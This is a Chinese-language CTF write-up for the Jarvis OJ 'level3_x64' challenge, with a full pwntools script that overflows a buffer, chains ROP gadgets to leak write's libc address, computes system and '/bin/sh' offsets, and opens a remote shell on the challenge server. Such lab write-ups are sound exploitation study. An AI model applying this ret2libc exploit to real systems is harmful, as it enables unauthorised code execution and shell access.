level3_x64裡沒有找到system函式，但給了libc.so檔案，應該是和level3一樣的想法。
先找到操作暫存器的地址，因為write需要3個引數，所以需要rdi,rsi,rdx。但我們搜尋只找到了rdi和rsi。

0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret

根據網上wp，gdb在read處下斷，驗證rdx在此時等於0x200，只要大於8就可以。對於這點，我是這麼理解的：我們是在vul函式裡寫入資料的，讀取資料時呼叫了read(0, &buf, 0x200uLL)，將rdx賦值0x200，後面直接就溢位到我們構造的棧了，沒有修改rdx暫存器的值了，所以不用修改。

此時遇到地址問題，卡了兩天，發現應該是虛擬機器的問題，裝了系統。記一些命令：
查命令地址：readelf -a libc-2.19.so | grep " [email protected]"
查字串地質：strings -a -t x libc-2.19.so | grep "/bin/sh"

回到題目，那麼直接構造payload1='a'*0x88+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_r15_addr)+p64(write_got)+"junkjunk"+p64(write_plt)+p64(vul_addr)
recv得到伺服器函式地址write_addr。同理offset=write_addr-libc.symbols[‘write’]。
指令碼：

from pwn import * 
#context.log_level="debug" 
elf=ELF("level3_x64") 
write_plt=elf.symbols["write"] 
write_got=elf.got["write"] 
vul_addr=elf.symbols['vulnerable_function']

p=remote("pwn2.jarvisoj.com",9883) 
p.recvuntil("Input:\n") 
pop_rdi_addr=0x00000000004006b3   #0x00000000004006b3 : pop rdi ; ret
pop_rsi_r15_addr=0x00000000004006b1      #0x00000000004006b1 : pop rsi ; pop r15 ; ret

payload1='a'*0x88+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_r15_addr)+p64(write_got)+"junkjunk"+p64(write_plt)+p64(vul_addr)
p.sendline(payload1) 
t=p.recv(8)
write_addr=u64(t[0:8]) 
print "write_addr="+hex(write_addr) 

libc=ELF("libc-2.19.so") 
offset=write_addr-libc.symbols["write"] 
sys_addr=offset+libc.symbols["system"] 
bin_addr=offset+libc.search("/bin/sh").next()
payload2='a'*0x88+p64(pop_rdi_addr)+p64(bin_addr)+p64(sys_addr)+"ret-addr"
p.sendline(payload2) 
p.interactive()
p.close()